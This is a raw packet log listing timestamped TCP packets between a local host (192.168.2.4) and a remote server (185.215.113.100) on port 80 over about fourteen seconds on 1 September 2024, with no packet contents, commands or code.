Sep 1, 2024 23:03:27.622003078 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.837615013 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.837668896 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.837703943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.837716103 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.837754011 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.921099901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.921109915 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.921175003 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:28.046365976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.046375036 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.046619892 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:28.495783091 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.495796919 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.495846987 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:28.690697908 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.690711021 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.690721035 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.690797091 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:28.690839052 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:28.773658991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.773730040 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:28.773813009 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:28.773863077 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.181514978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.181540012 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.181551933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.181560993 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.181572914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.181581020 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.181617975 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.181653023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.392498970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.392559052 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.392663956 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.392663956 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.431643009 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.431653023 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.431746960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.431756020 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:29.431893110 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:29.431893110 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:31.415585041 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:31.415689945 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:31.415688038 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:31.415740013 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:31.893564939 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:31.893624067 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:31.893646002 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:31.893685102 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:31.977464914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:31.977523088 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:31.977562904 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:31.977607965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.082670927 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.082717896 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.082724094 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.082730055 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.082753897 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.082763910 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.082775116 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.082804918 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.165254116 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.165263891 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.165303946 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.165328026 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:32.286118984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.286128998 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:32.286309958 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.236140013 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.236207008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.236284971 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.236306906 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.236352921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.423732042 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.423744917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.423751116 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.423834085 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.506225109 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.506253958 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.506421089 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.642024040 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.642153025 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.642206907 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.724370003 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.724380970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.724436998 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.900757074 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.900829077 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.901015997 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.901036024 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.901071072 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.901088953 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.901689053 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.901701927 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.901714087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:33.901742935 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:33.901773930 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:34.104757071 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.104768991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.104893923 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.104938984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.104949951 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.104957104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:34.104984045 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:34.105006933 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:34.105026960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.105062008 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:34.968683958 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.968698978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:34.968760967 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.177937031 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.177962065 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.177972078 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.177999973 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.178025007 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.391725063 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.391755104 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.391766071 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.391791105 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.391807079 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.391871929 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.391916037 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.391976118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.392015934 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.591470957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.591514111 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.591566086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.591607094 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.654830933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.654870987 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.654880047 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.654927015 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.654992104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.839628935 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.839643002 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.839715958 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.848535061 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.848597050 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.848604918 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.848608971 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.848647118 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.848686934 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.922197104 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.922230959 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:35.922250032 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:35.922292948 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.048892975 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.048917055 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.048928976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.048950911 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.048991919 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.049129963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.049160957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.049169064 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.049181938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.049210072 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.251008034 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.251019955 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.251140118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.251204967 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.251266003 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.251313925 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.251326084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.251351118 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.251379967 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.462635994 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.462685108 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.462697029 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.462719917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.462733030 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.462752104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.462796926 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.545398951 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.545437098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.545456886 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.545486927 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.661122084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.661134005 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.661143064 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.661196947 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.661307096 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.661355019 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:36.661371946 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.661381960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:36.661417961 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:37.973536015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:37.973547935 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:37.973736048 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.315694094 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.315706968 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.315785885 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.315805912 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.315857887 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.316160917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.316170931 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.316215038 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.423309088 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.423321962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.423331976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.423371077 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.423398972 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.424058914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.424068928 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.424083948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.424093962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.424115896 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.424143076 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.637208939 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.637255907 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.637265921 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.637315989 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.637352943 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.682974100 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.683003902 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.683012962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.683043003 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.683095932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.834533930 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.834618092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.834631920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.834640026 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.834664106 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.834805965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.834805965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.834805965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.892636061 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.892678976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.892689943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.892846107 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.892846107 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.917279959 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.917339087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:38.917349100 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:38.917386055 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.296984911 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.296998024 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297049999 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297060966 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297071934 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.297111988 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.297250032 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297301054 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.297302008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297314882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297343969 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.297357082 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.297375917 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.297427893 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.382174015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.382185936 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.382220984 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.382253885 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.500873089 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.500897884 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.500940084 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.500957012 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.500967979 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:39.500968933 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.500991106 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:39.501009941 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.218429089 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.218441963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.218621969 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.420700073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.420712948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.420809984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.420824051 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.420857906 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.420890093 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.420907974 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.827995062 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828006029 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828103065 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828155041 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828162909 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828176975 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828227043 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828243971 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828277111 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828335047 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828515053 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828530073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828557014 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828571081 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828818083 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828867912 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.828907013 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.828955889 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.877499104 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.877511978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.877521992 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:40.877554893 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:40.877583027 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.030224085 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.030258894 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.030287027 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.030308008 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.030308008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.030345917 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.030400991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.030411959 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.030421019 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.030442953 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.030474901 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.139707088 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.139729023 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.139782906 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.234246969 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.234293938 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.234303951 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.234333992 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.234352112 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.234462976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.234509945 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.234513044 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.234522104 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.234561920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.234617949 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.387690067 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.387701035 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.387779951 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.387811899 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.435058117 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.435069084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.435079098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.435146093 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.435195923 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.435200930 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.435209990 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.435252905 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.437124014 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.637398958 CEST	80	49730	185.215.113.100	192.168.2.4
